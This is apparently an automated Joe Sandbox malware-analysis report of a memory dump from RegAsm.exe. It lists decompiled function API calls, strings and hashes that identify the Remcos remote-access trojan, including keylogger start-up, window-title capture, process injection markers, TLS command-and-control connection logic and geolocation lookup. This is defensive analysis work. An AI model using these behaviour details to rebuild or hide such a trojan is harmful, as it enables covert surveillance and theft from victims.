Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB9B
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E92F), ref: 0041CBAC
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CBAF
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E92F), ref: 0041CBC0
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CBC3
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CBD1

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E93C

Part of subcall function 00410E85: __EH_prolog.LIBCMT ref: 00410E8A

Strings

del, xrefs: 0040F21F
Remcos Agent initialized, xrefs: 0040EF3D
del, xrefs: 0040F23B, 0040F2BD
Access Level: , xrefs: 0040F1ED
PG, xrefs: 0040ED21
User, xrefs: 0040F1DC
8SG, xrefs: 0040EE6B
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040E934, 0040ED5D
SG, xrefs: 0040EAB0
dMG, xrefs: 0040F0F6
exepath, xrefs: 0040EDE0, 0040EE8E
PSG, xrefs: 0040F172
PG, xrefs: 0040EF84
PG, xrefs: 0040F079
PG, xrefs: 0040F0D5
Administrator, xrefs: 0040F1D5
Exe, xrefs: 0040EA5D
PG, xrefs: 0040ECC9
PG, xrefs: 0040F115
8SG, xrefs: 0040EDB3
PG, xrefs: 0040E9E4
licence, xrefs: 0040EED6
SG, xrefs: 0040EA53
PG, xrefs: 0040EEB4
PG, xrefs: 0040F051
PG, xrefs: 0040F0A2
Software\, xrefs: 0040EA11
PG, xrefs: 0040F026
license_code.txt, xrefs: 0040E99B
PG, xrefs: 0040EC95
Inj, xrefs: 0040EB23, 0040EB3A
PG, xrefs: 0040EDFA
PG, xrefs: 0040F141
PG, xrefs: 0040E9AB

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
API String ID: 2830904901-1084268468
Opcode ID: 1d88ccd1ee5b0534a8449efec8af2c5dd8417e7ac025301b1f9f9c8566d9ef76
Instruction ID: d8e748011ac261579b04b62acd89da4cc948a8ae52a086a136a565020762d1ab
Opcode Fuzzy Hash: 1d88ccd1ee5b0534a8449efec8af2c5dd8417e7ac025301b1f9f9c8566d9ef76
Instruction Fuzzy Hash: F932E860B043412BDA14B7729C67B6E26994F81748F50483FB9467B2E3EEBC8D45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00414E78 Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414EC9
WSAGetLastError.WS2_32(00000000,00000001), ref: 004150DA
Sleep.KERNEL32(00000000,00000002), ref: 00415A25

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

Strings

Disconnected, xrefs: 00415995
Connection Error: Unable to create socket, xrefs: 00415138
dMG, xrefs: 004153E7
TLS On , xrefs: 00415041
Connection Error: , xrefs: 004150ED
hlight, xrefs: 004152E1
PG, xrefs: 00415276
%I64u, xrefs: 00415244
NG, xrefs: 00415371
PG, xrefs: 004159EC
TLS Off, xrefs: 00415033
Connected | , xrefs: 0041519C
PSG, xrefs: 0041544C
PG, xrefs: 00414EA2
name, xrefs: 004152B4
| , xrefs: 00415060, 004151A1
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 0041530E
8SG, xrefs: 0041528E
NG, xrefs: 00415330
Connecting | , xrefs: 00415056
4.9.2 Pro, xrefs: 00415419

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$4.9.2 Pro$8SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
API String ID: 524882891-65139843
Opcode ID: 46bb63376d1ac30be49412c4cf6b81a32735aa2615da81d2a76f3e0c03bbb50e
Instruction ID: 0c0af6725c2ee72569da9b24d69e1a2afa1e62434ece525c72468294da20a235
Opcode Fuzzy Hash: 46bb63376d1ac30be49412c4cf6b81a32735aa2615da81d2a76f3e0c03bbb50e
Instruction Fuzzy Hash: 22527B31A001155ACB18F732DD96AFEB3759F90348F5041BFE40A761E2EF781E858A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00414CD4 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414D23
LoadLibraryA.KERNEL32(?), ref: 00414D65
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414D85
FreeLibrary.KERNEL32(00000000), ref: 00414D8C
LoadLibraryA.KERNEL32(?), ref: 00414DC4
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414DD6
FreeLibrary.KERNEL32(00000000), ref: 00414DDD
GetProcAddress.KERNEL32(00000000,?), ref: 00414DEC
FreeLibrary.KERNEL32(00000000), ref: 00414E03

Strings

getaddrinfo, xrefs: 00414CE1, 00414D7F, 00414DD0
\wship6, xrefs: 00414DAC
\ws2_32, xrefs: 00414D4D
getnameinfo, xrefs: 00414CF0
freeaddrinfo, xrefs: 00414D00

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 8bee0785508e6c960bcbf0281b12361e544454b7fefe14523764ee1ecffa666c
Instruction ID: 871d15ce04c65df1b42d9b9bb68fd0349182852438c0ab10db097056de8955f1
Opcode Fuzzy Hash: 8bee0785508e6c960bcbf0281b12361e544454b7fefe14523764ee1ecffa666c
Instruction Fuzzy Hash: 6F31D3B1A01315ABC720AB65DC84EDFB7DCAF84754F40092BF85893211E778D9858AEE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC24 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 0040AC86
Sleep.KERNEL32(000001F4), ref: 0040AC91
GetForegroundWindow.USER32 ref: 0040AC97
GetWindowTextLengthW.USER32 ref: 0040ACA0
GetWindowTextW.USER32 ref: 0040ACD4
Sleep.KERNEL32(000003E8), ref: 0040ADA2

Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,?,0040B77D,?,?,?,?,?,00000000), ref: 0040A5B0

Strings

lG, xrefs: 0040ACDA
{ User has been idle for , xrefs: 0040ADD4
], xrefs: 0040AD36
[, xrefs: 0040AD3C
minutes }, xrefs: 0040ADC8
lG, xrefs: 0040AC6B
lG, xrefs: 0040ACF0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]$lG$lG$lG
API String ID: 911427763-790354841
Opcode ID: 534ec61adf4de1930bd1e90a652c1cd03aad4189a68e7dfde427f5cc7974b0df
Instruction ID: a6336e939aeddfcf0e53b46632b03f7586de99f06c4f75a03a301e66baf156ba
Opcode Fuzzy Hash: 534ec61adf4de1930bd1e90a652c1cd03aad4189a68e7dfde427f5cc7974b0df
Instruction Fuzzy Hash: 145190716043409BD314FB31D856AAE77A6AF84308F40093FF586A22E2EF7C9955C69F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A674 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 0040A68E

Part of subcall function 0040A5C3: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A5F9
Part of subcall function 0040A5C3: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A69B), ref: 0040A608
Part of subcall function 0040A5C3: Sleep.KERNEL32(00002710,?,?,?,0040A69B), ref: 0040A635
Part of subcall function 0040A5C3: CloseHandle.KERNEL32(00000000), ref: 0040A63C

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A6CA
GetFileAttributesW.KERNEL32(00000000), ref: 0040A6DB
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A6F2
PathFileExistsW.SHLWAPI(00000000), ref: 0040A76C

Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C3EC

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A875

Strings

pQG, xrefs: 0040A6BF
pQG, xrefs: 0040A6AF
PG, xrefs: 0040A855
8SG, xrefs: 0040A750
PG, xrefs: 0040A6FA
8SG, xrefs: 0040A745

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$pQG$pQG$PG$PG
API String ID: 3795512280-1152054767
Opcode ID: 6fe2898c7a098da1e411ac960d19b54830d1cd1166583224f82eb58c1664eb67
Instruction ID: cf95c0dacd67fb8131f25f5cd09860d96f75af0bde8ca3c14b7674e5c1903afd
Opcode Fuzzy Hash: 6fe2898c7a098da1e411ac960d19b54830d1cd1166583224f82eb58c1664eb67
Instruction Fuzzy Hash: 4C517E716043055ACB05BB32C866ABE77AA5F80349F40483FB682B71E2DF7C9909865E

Uniqueness

Uniqueness Score: -1.00%

Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

Strings

I+, xrefs: 004048CB
TLS Handshake... | , xrefs: 00404904
Connection Refused, xrefs: 00404A76
TLS Error 3, xrefs: 004049D8
TLS Error 1, xrefs: 00404937
Connection Failed: , xrefs: 00404A43
TLS Error 2, xrefs: 00404955
TLS Authentication Failed, xrefs: 00404999

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: I+$Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-3565969508
Opcode ID: ab4cb6909e3c6c2de8a63f62b80cba0d09a48fc96966410bdc9691a4cb57bb68
Instruction ID: 1d1f4e3e38f99df0ccdd24eaac06efc89d62f3200a1196d06f059074cb1d02c7
Opcode Fuzzy Hash: ab4cb6909e3c6c2de8a63f62b80cba0d09a48fc96966410bdc9691a4cb57bb68
Instruction Fuzzy Hash: 104107B47407116BC61477BA8D1B52E7A55AB81308B90017FE60266AD3EA79AC108BEF

Uniqueness

Uniqueness Score: -1.00%

Function 0040D982 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32 ref: 0040DAE8

Strings

WinDir, xrefs: 0040D9E9, 0040DA0B, 0040DA5D
Temp, xrefs: 0040D9B4
\SysWOW64, xrefs: 0040DA4E
\system32, xrefs: 0040D9FC
ProgramFiles, xrefs: 0040DABC
UserProfile, xrefs: 0040DAA6
SystemDrive, xrefs: 0040D9DF
AppData, xrefs: 0040DA9F
ProgramData, xrefs: 0040DAAD

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: f046f9a62e8bdb3957ff117acdf5a22329d3422e50412b4b9eb147fc11127afb
Instruction ID: 145e99ee69a128d844c50a4e5757f73a1ea156b369d54702e3bea958445c7b3d
Opcode Fuzzy Hash: f046f9a62e8bdb3957ff117acdf5a22329d3422e50412b4b9eb147fc11127afb
Instruction Fuzzy Hash: 324142716082019AC215FB61DC56CAFB3A8AED075CF10053FB146B20E2FF789D49C65B

Uniqueness

Uniqueness Score: -1.00%

Function 0044AB09 Relevance: 12.2, APIs: 8, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DC4F,?,?,?,0044AD5A,00000001,00000001,?), ref: 0044AB63
__alloca_probe_16.LIBCMT ref: 0044AB9B
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DC4F,?,?,?,0044AD5A,00000001,00000001,?), ref: 0044ABE9
__alloca_probe_16.LIBCMT ref: 0044AC80
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044ACE3
__freea.LIBCMT ref: 0044ACF0

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

__freea.LIBCMT ref: 0044ACF9
__freea.LIBCMT ref: 0044AD1E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 7d683781b2dd792c8ae14ef5007877638cb2880d622bc3fa92b70de851f219b5
Instruction ID: af0dc4fbe63ecb207d56a2a0cf6a6b4459746298ae4a4ccc7a56e973e124d7e9
Opcode Fuzzy Hash: 7d683781b2dd792c8ae14ef5007877638cb2880d622bc3fa92b70de851f219b5
Instruction Fuzzy Hash: 69512B72640206AFFB254F64CC81EBF77AAEB44750F15422EFD05D6280EB38DC50C699

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B2F5
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B30B
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B324
InternetCloseHandle.WININET(00000000), ref: 0041B36A
InternetCloseHandle.WININET(00000000), ref: 0041B36D

Strings

http://geoplugin.net/json.gp, xrefs: 0041B305

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 8b472524030bf7c635141974e58b7f97de1c6538b3199a2a2a8ba892cf3f21f3
Instruction ID: 51d5d9e6badc34deb6fc5e13cd0461c56716845dbac29438bce231469f2039f8
Opcode Fuzzy Hash: 8b472524030bf7c635141974e58b7f97de1c6538b3199a2a2a8ba892cf3f21f3
Instruction Fuzzy Hash: 221108311053126BD224AB269C89EBF7F9CEF86355F00043EF945A2281DB68DC45C6F6

Uniqueness

Uniqueness Score: -1.00%

Function 0041C33F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C37E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C39B
CloseHandle.KERNEL32(00000000), ref: 0041C3A7
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C3B8
CloseHandle.KERNEL32(00000000), ref: 0041C3C5

Strings

hpF, xrefs: 0041C340

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID: hpF
API String ID: 1852769593-151379673
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 157d56447e2bc733fdf4ad62f20ed10b0773735c38ec4f108ef208bf9d1535e6
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: 6E11E571284319FFE7144A249CC8EFB739CEB4A365F10862BF962C22D1C625CC81963D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B211 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16

Part of subcall function 004134F4: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
Part of subcall function 004134F4: RegQueryValueExA.KERNEL32 ref: 00413535
Part of subcall function 004134F4: RegCloseKey.KERNEL32(?), ref: 00413540

StrToIntA.SHLWAPI(00000000), ref: 0041B28A

Strings

ProductName, xrefs: 0041B220
CurrentBuildNumber, xrefs: 0041B26B
(32 bit), xrefs: 0041B2BD
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B225, 0041B22F, 0041B270
(64 bit), xrefs: 0041B2B6

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 0e35e9be9370b82b517a413bc3a555fa93f4e3e4eaa901d9a01d48599d1daad4
Instruction ID: 85ec155db325c3716f7be7651620dee3a3d5c829a50febba6db02ef006b91dd8
Opcode Fuzzy Hash: 0e35e9be9370b82b517a413bc3a555fa93f4e3e4eaa901d9a01d48599d1daad4
Instruction Fuzzy Hash: 4D11E770A4010516C704B36A8C9BEFF76598B51304F54053BF546B21D2FB7C5D8683EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A5F9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A69B), ref: 0040A608
Sleep.KERNEL32(00002710,?,?,?,0040A69B), ref: 0040A635
CloseHandle.KERNEL32(00000000), ref: 0040A63C

Strings

XQG, xrefs: 0040A5EE

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: effddecaee9a5f77b990edd8a390069ea8cd53d98003785b57b7107b701bccdd
Instruction ID: 3707d938aca408b7ae5a758f45b809843a01d1a20cbb3131bb2780466404e056
Opcode Fuzzy Hash: effddecaee9a5f77b990edd8a390069ea8cd53d98003785b57b7107b701bccdd
Instruction Fuzzy Hash: 5A11EB30640740AAE6316B249899B1F3A69EB45316F48093AF1C26A6D2C67A5CA5C72E

Uniqueness

Uniqueness Score: -1.00%

Function 00415A38 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00415A5D
GetTickCount.KERNEL32 ref: 00415AD4

Strings

NG, xrefs: 00415A8C
!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@$NG
API String ID: 180926312-2721294649
Opcode ID: f9039504c2f437f8ba7988922d174b067c0e3f117173c373824bde607c9f77d6
Instruction ID: 4664a4f16019f4c21568267905f705ac892616566a68641603d99fb648fe5e11
Opcode Fuzzy Hash: f9039504c2f437f8ba7988922d174b067c0e3f117173c373824bde607c9f77d6
Instruction Fuzzy Hash: 2A51B6715082419AC724FB32D852AFF73A5AF90344F50483FF546671E2EF7C5946C68A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B0C0
Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 72e299c11377f0a427cf9d679ec79f863cd08e360ccb18c647ea1a11922a394a
Instruction ID: 95025eaa149aa7af44262cf4db9397527febe2deab88762ca52139077396e222
Opcode Fuzzy Hash: 72e299c11377f0a427cf9d679ec79f863cd08e360ccb18c647ea1a11922a394a
Instruction Fuzzy Hash: C91194B11003187AD220B7369C86CBF765CDE8139CB40057FF546225D2EA795D54CAFB

Uniqueness

Uniqueness Score: -1.00%

Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415C24,?,00000001), ref: 00404F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415C24,?,00000001), ref: 00404FCD
CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00404F94

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 082ae36f3936cb6e40208b16190b89ec08c6e4c5d4be21b07eeb4c36054df58b
Instruction ID: 3be0fb6296c169822b6bfad2b003431a84525fea4849727fdd8bc91c5f69ea92
Opcode Fuzzy Hash: 082ae36f3936cb6e40208b16190b89ec08c6e4c5d4be21b07eeb4c36054df58b
Instruction Fuzzy Hash: 79110671800385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 004136BD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004136CC
RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004136F4
RegCloseKey.KERNEL32(?), ref: 004136FF

Strings

pth_unenc, xrefs: 004136C1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 87a8587fdf61455578c18fadf820c0f2941d90eae7f8086bdc4bef892f8b9eae
Instruction ID: cc028357d89538f4ae3fadff7a052b61de77b90b6085a72f54274e8bffa45260
Opcode Fuzzy Hash: 87a8587fdf61455578c18fadf820c0f2941d90eae7f8086bdc4bef892f8b9eae
Instruction Fuzzy Hash: 51F06272400218FBCB009FA1DC45DEE3B6CEF05751F108566FD09A61A1D7359E14DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
CloseHandle.KERNEL32(?), ref: 00404DDB

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 0f902c50f68177a48589da84d99d87b9834b108c6d20614da67969fb47c64140
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: 0f902c50f68177a48589da84d99d87b9834b108c6d20614da67969fb47c64140
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Uniqueness

Uniqueness Score: -1.00%

Function 00448426 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue), ref: 00448458
GetLastError.KERNEL32(?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004481A7), ref: 00448464
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 00448472

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

